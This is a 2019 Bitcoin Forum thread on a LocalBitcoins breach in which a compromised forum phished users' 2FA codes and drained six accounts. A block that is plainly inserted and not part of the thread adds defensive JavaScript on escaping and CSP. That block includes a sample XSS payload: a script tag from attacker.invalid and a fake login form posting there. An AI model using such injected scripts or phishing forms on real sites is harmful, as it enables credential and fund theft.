Bitcoin Forum

Economy => Exchanges => Topic started by: mk4 on January 26, 2019, 01:16:46 PM



Title: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: mk4 on January 26, 2019, 01:16:46 PM
WARNING: DO NOT LOGIN TO LOCALBITCOINS
LocalBitcoins seems to be fine now.


Typing this on mobile right now. Just saw this on Reddit.

Thread:
Quote
When visiting the localbitcoins forum: https://localbitcoins.com/forums/

Users are prompted to log into their account, as if they have been logged out. This only seems to happen if you are already logged in. This is a PHISHING SITE and 2FA codes are being used to empty customer accounts. Withdrawals have since been suspended by LocalBitcoins.

https://www.reddit.com/r/Bitcoin/comments/ajzym3/psa_localbitcoinscom_compromised_do_not_attempt/

For now we currently have little to no information about what happened/what's happening.



EDIT: Currently not confirmed, but the hackers wallet was said to be this address: 13WaahhsiGph4ysmQtjVhVTdgQUSL62KJr (https://www.blockchain.com/btc/address/13WaahhsiGph4ysmQtjVhVTdgQUSL62KJr)

7.95205862 BTC was sent to this address as of this moment.



EDIT #2: Still no announcement from LocalBitcoins as of now. Will be editing the title of this thread after the things clear up.

https://twitter.com/LocalBitcoins



EDIT #3 Finally an update from LocalBitcoins. Edited the topic title.

Quote
LocalBitcoins' report on the security vulnerability 26.01.2019

We would like to inform that today 26.01.2019 at approximately 10:00:00 UTC, LocalBitcoins has detected a security vulnerability - an unauthorised source was able to access and send transactions from a number of affected accounts. Outgoing transactions were temporarily disabled while we investigated the case.

We were able to identify the problem, which was related to a feature powered by a third party software, and stop the attack. At the moment, we are determining the correct number of users affected - so far six cases have been confirmed. For security reasons, the forum feature has been disabled until further notice.

Outgoing transactions have already been re-enabled and we have taken a number of measures to address this issue and secure the limited number of accounts that might have been at risk.

Your LocalBitcoins accounts are currently safe to log in and use - we encourage you to enable Two-factor authentication, if you have not yet.

We sincerely apologise for any inconvenience this might have caused.

Kind Regards, LocalBitcoins

https://www.reddit.com/r/localbitcoins/comments/ak1u8m/localbitcoins_report_on_the_security/


Title: Re: WARNING: DO NOT LOGIN TO LOCALBITCOINS
Post by: 100bitcoin on January 26, 2019, 01:27:01 PM
Reports of lots of coin loss are surfacing. No official update on their twitter as of yet - https://twitter.com/LocalBitcoins


Title: Re: WARNING: DO NOT LOGIN TO LOCALBITCOINS
Post by: HippiePyro on January 26, 2019, 01:37:55 PM
Forum has been disabled. Here we go again.


Title: Re: WARNING: DO NOT LOGIN TO LOCALBITCOINS
Post by: jademaxsuy on January 26, 2019, 01:46:45 PM
WARNING: DO NOT LOGIN TO LOCALBITCOINS

Typing this on mobile right now. Just saw this on Reddit.

Thread:
"When visiting the localbitcoins forum: https://localbitcoins.com/forums/

Users are prompted to log into their account, as if they have been logged out. This only seems to happen if you are already logged in. This is a PHISHING SITE and 2FA codes are being used to empty customer accounts. Withdrawals have since been suspended by LocalBitcoins."

https://www.reddit.com/r/Bitcoin/comments/ajzym3/psa_localbitcoinscom_compromised_do_not_attempt/
Another exchange attack. Bitcoin may be vulnerable from decrypting, but its exchanges are not safe and are vulnerable to hijacking or hacking by someone. The problem starts when a user has stored some of their crypto in the exchanges. Probably you will wake up one day losing all the crypto in the exchange wallet.


Title: Re: WARNING: DO NOT LOGIN TO LOCALBITCOINS
Post by: OmegaStarScream on January 26, 2019, 01:49:22 PM
From the look of it, there have been few reports and the damage is not that big (or still not reported from the users yet). If that's the case and the team is as professional as they claim to be, they should reimburse the users. Just another reason on why you shouldn't keep your funds in exchanges by the way.


Title: Re: WARNING: DO NOT LOGIN TO LOCALBITCOINS
Post by: mk4 on January 26, 2019, 01:54:33 PM
From the look of it, there have been few reports and the damage is not that big (or still not reported from the users yet). If that's the case and the team is as professional as they claim to be, they should reimburse the users. Just another reason on why you shouldn't keep your funds in exchanges by the way.

From the looks of it based on the discussions, it seems like the forum-side of LocalBitcoins was compromised and the hacker is using the login to phish the forum accounts, for the hacker to be able to withdraw the funds of the users. Hopefully it stopped here as the forum has been disabled. Not 100% sure though.


Title: Re: WARNING: DO NOT LOGIN TO LOCALBITCOINS
Post by: bellamente on January 26, 2019, 02:05:30 PM
How long will this go on? Another cryptocurrency exchange has been cracked. Phishing, one of the most experienced viruses. I hope the team of the LOCALBITCOINS project will do everything to ensure that the cryptocurrency remains with the owners


Title: Re: WARNING: DO NOT LOGIN TO LOCALBITCOINS
Post by: leninay on January 26, 2019, 02:49:01 PM
How long will this go on? Another cryptocurrency exchange has been cracked. Phishing, one of the most experienced viruses. I hope the team of the LOCALBITCOINS project will do everything to ensure that the cryptocurrency remains with the owners

Not surprising, every year they hack the exchanges, just recently there was information about breaking into large crypto exchanges and selling verified user documents

https://www.ccn.com/hacked-customer-data-from-world-leading-cryptocurrency-exchanges-for-sale-on-the-dark-web/

How do you not understand that to keep money even in the bank is unsafe and especially on the exchanges

My advice to you is to keep your cryptocurrency in cold wallets on your computer and this will not protect you from hacking by 100%

In my opinion this is the safest place


Title: Re: WARNING: DO NOT LOGIN TO LOCALBITCOINS
Post by: mk4 on January 26, 2019, 04:07:48 PM
How long will this go on? Another cryptocurrency exchange has been cracked. Phishing, one of the most experienced viruses. I hope the team of the LOCALBITCOINS project will do everything to ensure that the cryptocurrency remains with the owners
As long as exchanges are around, hacks will happen whether we like it or not.



Update: edited the topic to include the message from LocalBitcoins.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: o_e_l_e_o on January 26, 2019, 04:25:25 PM
Looks like localbitcoins managed to shut this down pretty quickly after it started up actually, but the hackers still managed to make off with just shy of 8 BTC ($28,000) from 5 users (assuming that 1 address is the only address they used). Wonder if localbitcoins will compensate the users affected?

Once again, we have to wonder why users keep leaving large amounts of funds on exchanges. Say it with me now: Not your keys, not your bitcoin. Not your keys, not your bitcoin. Not your keys, not your bitcoin. Not your keys, not your bitcoin.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: romero121 on January 26, 2019, 04:58:51 PM
Localbitcoins.com was one among the best platforms that has got its service around the world. Quite often bitcoin fraudulent activities happen through localbitcoins. This time the same has taken place on a large scale as more and more hackers have focused on the cryptocurrency network. Two years back I lost through a hack that was completely because of not enabling two factor authentication.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: goldexp83 on January 26, 2019, 04:59:55 PM
wow this is pretty scary, was it the first time happening???

I like localbitcoin and always thought it's a pretty good site, not that fancy but usability is totally there

I hope a safer system will be in place to avoid this kind of scary hacks


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: mk4 on January 26, 2019, 05:32:20 PM
Wonder if localbitcoins will compensate the users affected?
They should just compensate the stolen bitcoin in my opinion. While 8 BTC is definitely a lot for me, it's probably not that much for them when taking into account how much they're potentially earning. Compensating the stolen BTC would be a great PR move too.

wow this is pretty scary, was it the first time happening???

I like localbitcoin and always thought it's a pretty good site, not that fancy but usability is totally there

I hope a safer system will be in place to avoid this kind of scary hacks
It's the first time for LocalBitcoins as far as I know. From the hacker's point of view, getting past LocalBitcoins itself is probably difficult, hence the attacker went for the weaker link: the forum software. Correct me if I'm wrong, but the LocalBitcoins exchange itself and the LocalBitcoins forum have accounts that are connected; so the attacker took advantage of this. Quite smart really.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: FedorIzmailov on January 26, 2019, 06:00:56 PM
I once said that you need to store Bitcoin, namely, you knew about your cold wallets, but you used other exchanges.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: o_e_l_e_o on January 26, 2019, 08:01:12 PM
What about our personal information, is it safe too or did the attackers take it too?
This was a man-in-the-middle type attack on individual users' accounts, stealing their 2FA keys via the forum to log in to their LBC accounts and transfer out their funds. There was no hack on the main LBC wallets or databases, so your personal information won't be affected. I would encourage everyone, however, to think twice before performing KYC with any service online. Just because your documents weren't accessed with this attack, doesn't mean they won't be accessed in the future.


They should just compensate the stolen bitcoin in my opinion.
According to this reddit post (https://www.reddit.com/r/localbitcoins/comments/ajzyow/psa_localbitcoinscom_compromised_do_not_attempt/ef0t31g/?context=2), one of the affected users has already had his lost balance reimbursed.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: pixie85 on January 26, 2019, 08:36:15 PM
I once said that you need to store Bitcoin, namely, you knew about your cold wallets, but you used other exchanges.

You can't expect everything to be stored in cold wallets. They stole a very small number of coins and as long as the loss is small it can be reimbursed and won't affect the business that much. If you have 1000 Bitcoin on your platform it's natural that up to 10% will be in hot wallets but some businesses like that Korean exchange that was hacked had all of their money in hot wallets.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: kelz1 on January 26, 2019, 09:17:34 PM
These hackers are becoming very sophisticated, I wouldn't be surprised if it was the same team behind the electrum wallet hack as it follows the same pattern of phishing for login details. Bad day for bitcoiners as localbitcoins is a good website


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: squatter on January 27, 2019, 12:13:35 AM
Quote
We were able to identify the problem, which was related to a feature powered by a third party software, and stop the attack.

Are there any more details about this third party software and what the vulnerability was exactly?

I read a couple articles about the attack and I was led to believe this was a DNS spoofing attack on the forum subdomain. It sounds like that's not actually the case?

They should just compensate the stolen bitcoin in my opinion.
According to this reddit post (https://www.reddit.com/r/localbitcoins/comments/ajzyow/psa_localbitcoinscom_compromised_do_not_attempt/ef0t31g/?context=2), one of the affected users has already had his lost balance reimbursed.

Glad to hear it. If the losses were really limited to 8 BTC, they should just compensate the victims out of goodwill.


Title: Re: WARNING: DO NOT LOGIN TO LOCALBITCOINS
Post by: nc50lc on January 27, 2019, 04:07:39 AM
I once said that you need to store Bitcoin, namely, you knew about your cold wallets, but you used other exchanges.
Typical... you know that those bitcoins are in an Exchange because users want/need to trade, right? (Apparently, obviously, surely, most of them got their "own" wallet)
You can't easily use a Cold wallet that was buried 20 feet under a random area guided with an "X" on a map to buy a HYPEd shitcoin before it gets pumped.

If that's the case and the team is as professional as they claim to be, they should reimburse the users. Just another reason on why you shouldn't keep your funds in exchanges by the way.
I'm afraid that keeping most of the coins in a hot/cold wallet is not possible for someone who's day trading. Personally, I prefer keeping a higher exchange balance than in a cold wallet since highly-priced orders yield higher profit.
Especially now that the price is on its (*typo edit) best buy, predictable low-liquidity and mostly everyone is expecting a rise.

Usually, it goes like this:
Source (ex.Mining)---→(HotWallet)--→EXCHANGE---(Mixer)---→Cold Wallet (Savings)
Other Sources-------⤴---------------⤴                 ↪-----→Hot Wallet  (Expenses)

Fortunately, legitimate exchanges today are heavily regulated and problems such as missing funds can be legally resolved.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: mk4 on January 27, 2019, 04:28:59 AM
Are there any more details about this third party software and what the vulnerability was exactly?

I read a couple articles about the attack and I was led to believe this was a DNS spoofing attack on the forum subdomain. It sounds like that's not actually the case?

I don't think they have given specific information about this matter as of now, but I don't think it's a DNS attack. From what it looks like, in my opinion, I'm personally leaning more towards a javascript/XSS injection on the forum software. Probably something like:

User visits forum --> script executes --> probably redirects the user to a phishing site(?)

Just my rough guess.
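The post above is a guess about the mechanism, and nothing in this thread confirms what the forum software actually did. As an added illustration (not code from the thread, from LocalBitcoins or from any forum package), the block below shows the general shape of the defect such a guess implies: a post renderer that interpolates untrusted text straight into HTML, beside the hardened form that escapes it, plus a Content-Security-Policy whose `form-action` directive would keep an injected "log in again" form from posting anything to another origin. The post content and the hostname `attacker.invalid` are constructed for the demo; `renderPostUnsafe`, `renderPostSafe` and `hasActiveContent` are names chosen here, not any real project's API.

```javascript
// Added example: untrusted forum content rendered unsafely vs. safely.
// Sample post and attacker.invalid hostname are constructed; nothing here
// is taken from LocalBitcoins or its forum software.

// Escape the five characters that let user text break out of HTML text
// or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable (constructed to show the defect): untrusted fields are
// interpolated straight into markup, so a post body carrying <script>
// or a fake login <form> becomes live HTML for every reader of the page.
function renderPostUnsafe(post) {
  return `<div class="post"><h3>${post.author}</h3><p>${post.body}</p></div>`;
}

// Hardened: every untrusted field is escaped before interpolation.
function renderPostSafe(post) {
  return `<div class="post"><h3>${escapeHtml(post.author)}</h3><p>${escapeHtml(post.body)}</p></div>`;
}

// Defence in depth: a Content-Security-Policy for forum pages.
// script-src without 'unsafe-inline' blocks injected inline scripts and
// scripts from other origins; form-action 'self' stops an injected form
// from submitting passwords or 2FA codes anywhere but the forum itself.
const FORUM_CSP = [
  "default-src 'self'",
  "script-src 'self'",
  "object-src 'none'",
  "base-uri 'self'",
  "form-action 'self'",
  "frame-ancestors 'none'",
].join('; ');

// Rough check used by the demo to tell whether rendered output still
// carries active content. It is a test aid, not a sanitizer: the real
// protection is escaping plus the CSP above.
function hasActiveContent(html) {
  return /<script\b|<form\b|<iframe\b|\son\w+\s*=|javascript:/i.test(html);
}

// Constructed sample: a post body with an injected script tag and a fake
// "session expired" login form pointing at a placeholder host.
const SAMPLE_POST = {
  author: 'trader42',
  body: 'Great trade! <script src="https://attacker.invalid/x.js"></script>' +
        '<form action="https://attacker.invalid/login">Session expired, log in again</form>',
};

// Returns what each renderer does with the sample post.
function demo() {
  return {
    unsafeActive: hasActiveContent(renderPostUnsafe(SAMPLE_POST)), // true
    safeActive: hasActiveContent(renderPostSafe(SAMPLE_POST)),     // false
    safeHtml: renderPostSafe(SAMPLE_POST),
  };
}

console.log(demo());
console.log('Content-Security-Policy:', FORUM_CSP);
```

The escaping is what removes the bug; the CSP is there because a single missed interpolation somewhere else in a large forum codebase is likely, and `form-action 'self'` specifically addresses the pattern described in this thread, where the injected content is a login prompt rather than a script.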


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: magneto on January 27, 2019, 06:36:54 AM
Thanks for letting us know. I actually had no idea of this until I came across this thread.

It's really a bit surprising to me though how small of an amount has actually been compromised, when an entire forum has been breached. I wouldn't doubt if the hacker has held onto some account details which at the time did not have any funds in them, because just 6 cases seems to be way too small

Even if you didn't sign into the forum during this time it's probably best to be safe, change your password and enable 2FA if you haven't already. It's a good thing that LBC is taking responsibility it seems and refunding people, which is at least professional on their part.

wow this is pretty scary, was it the first time happening???

I like localbitcoin and always thought it's a pretty good site, not that fancy but usability is totally there

I hope a safer system will be in place to avoid this kind of scary hacks

Don't think it's the first time that LBC has given us a scare. I remember back in the days it used to be down every once in a while and people would panic. Small hacks had happened a few years back as well.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: Ucy on January 27, 2019, 12:13:20 PM
Looks like localbitcoins managed to shut this down pretty quickly after it started up actually, but the hackers still managed to make off with just shy of 8 BTC ($28,000) from 5 users (assuming that 1 address is the only address they used). Wonder if localbitcoins will compensate the users affected?

Once again, we have to wonder why users keep leaving large amounts of funds on exchanges. Say it with me now: Not your keys, not your bitcoin. Not your keys, not your bitcoin. Not your keys, not your bitcoin. Not your keys, not your bitcoin.

Of course there will be compensation. It's not the users' fault that the company's vault was robbed by a thief.
If a thief robs a bank, breaks the bank vault and steals people's gold/jewelry, the bank is responsible for keeping the gold safe and will definitely compensate the owners.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: o_e_l_e_o on January 27, 2019, 02:09:25 PM
I wouldn't doubt if the hacker has held onto some account details which at the time did not have any funds in them, because just 6 cases seems to be way too small
I don't think doing that would be of any benefit to the hacker. The whole point of this attack was that it was stealing 2FA codes via the forum and using them to log in to exchange accounts. Keeping username and passwords would be no use unless the hacker had another way of stealing 2FA codes.


Of course there will be compensation. It's not the users' fault that the company's vault was robbed by a thief.
If a thief robs a bank, breaks the bank vault and steals people's gold/jewelry, the bank is responsible for keeping the gold safe and will definitely compensate the owners.
A bank is regulated and insured. Many crypto exchanges are not. Of course they should compensate the losses, but there have been many hacks in the past that haven't. It's by no means guaranteed.


Title: Re: LocalBitcoins vulnerability: 6 case of stolen funds confirmed as of now
Post by: mk4 on January 27, 2019, 03:29:38 PM
Of course there will be compensation. It's not the users' fault that the company's vault was robbed by a thief.
If a thief robs a bank, breaks the bank vault and steals people's gold/jewelry, the bank is responsible for keeping the gold safe and will definitely compensate the owners.

The example you gave really doesn't apply to bitcoin/cryptocurrency exchanges, as also reasoned out by o_e_l_e_o. Of all the exchanges that got hacked since the rise of bitcoin and cryptocurrencies in general, has every single exchange compensated their users for the stolen funds? No. Most, if not all, went bankrupt instead.